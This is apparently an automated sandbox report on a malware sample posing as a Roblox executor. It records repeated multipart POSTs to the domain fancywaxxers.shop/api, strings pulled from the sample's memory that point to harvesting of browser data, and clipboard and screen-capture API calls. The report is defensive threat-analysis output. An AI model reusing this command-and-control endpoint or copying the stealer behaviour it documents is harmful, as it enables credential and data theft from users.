                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2EKJAD3T7WDXLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12809Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DAKKXE4EIJND8HPYCXYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15087Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DVE80MC68OH49RH1N7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20571Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OXAT6TVT3CL1XKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1236Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G9COZEGBVXJQXXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 567879Host: fancywaxxers.shop
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: fancywaxxers.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.cop
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/0
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/141638
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/C
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/C1
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.000000000302F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/a
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api#
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2140783049.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.000000000302F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api/(b
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiO
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077082218.0000000005817000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077267157.0000000005818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiPS
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/i
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/q
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2140783049.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.000000000302F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/y
                Source: Solara-Roblox-Executor-v3.exe, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2094257173.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000003023000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093436705.000000000302F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49710 version: TLS 1.2
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00433070 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,6_2_00433070
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00433070 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,6_2_00433070
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00433210 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,StretchBlt,DeleteObject,SelectObject,DeleteDC,ReleaseDC,DeleteObject,6_2_00433210
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_0030EA8E0_2_0030EA8E
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_003034400_2_00303440
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_003105020_2_00310502
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_002FDDE20_2_002FDDE2
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_002F96DB0_2_002F96DB
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_0030EA8E3_2_0030EA8E
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_003034403_2_00303440
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_003105023_2_00310502
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_002FDDE23_2_002FDDE2
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_002F96DB3_2_002F96DB
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004238116_2_00423811
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0042B8C36_2_0042B8C3
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043A9406_2_0043A940
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043EA106_2_0043EA10
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0040DA956_2_0040DA95
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043F3706_2_0043F370
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0040CBF66_2_0040CBF6
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00410BB36_2_00410BB3
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004264706_2_00426470
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004374E06_2_004374E0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004215706_2_00421570
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004086906_2_00408690
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00418F2D6_2_00418F2D
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004268006_2_00426800
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004228106_2_00422810
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0042781B6_2_0042781B
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004058C06_2_004058C0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004160E76_2_004160E7
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004298E86_2_004298E8
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041A0F06_2_0041A0F0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004090906_2_00409090
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004038B06_2_004038B0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041D0B06_2_0041D0B0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041C8B06_2_0041C8B0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004240B06_2_004240B0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004061406_2_00406140
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043E1706_2_0043E170
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043C11D6_2_0043C11D
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043B9206_2_0043B920
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004281256_2_00428125
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004221306_2_00422130
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041993B6_2_0041993B
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0042D1E26_2_0042D1E2
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004291956_2_00429195
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004042606_2_00404260
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00425A006_2_00425A00
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004242006_2_00424200
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043B2106_2_0043B210
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043E2206_2_0043E220
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0042CA266_2_0042CA26
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043DAC56_2_0043DAC5
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004287C56_2_004287C5
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041DA806_2_0041DA80
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004122906_2_00412290
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043E2B06_2_0043E2B0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041536B6_2_0041536B
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00415B6C6_2_00415B6C
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043CB726_2_0043CB72
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0040C3216_2_0040C321
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041B3306_2_0041B330
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0040EBD06_2_0040EBD0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041E3F06_2_0041E3F0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00404B906_2_00404B90
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004073A06_2_004073A0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00436BB06_2_00436BB0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041644B6_2_0041644B
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0042D4796_2_0042D479
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0042B8C36_2_0042B8C3
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0042EC226_2_0042EC22
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00432C306_2_00432C30
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043ECC06_2_0043ECC0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004094E06_2_004094E0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0042BCED6_2_0042BCED
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041848E6_2_0041848E
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00445CA96_2_00445CA9
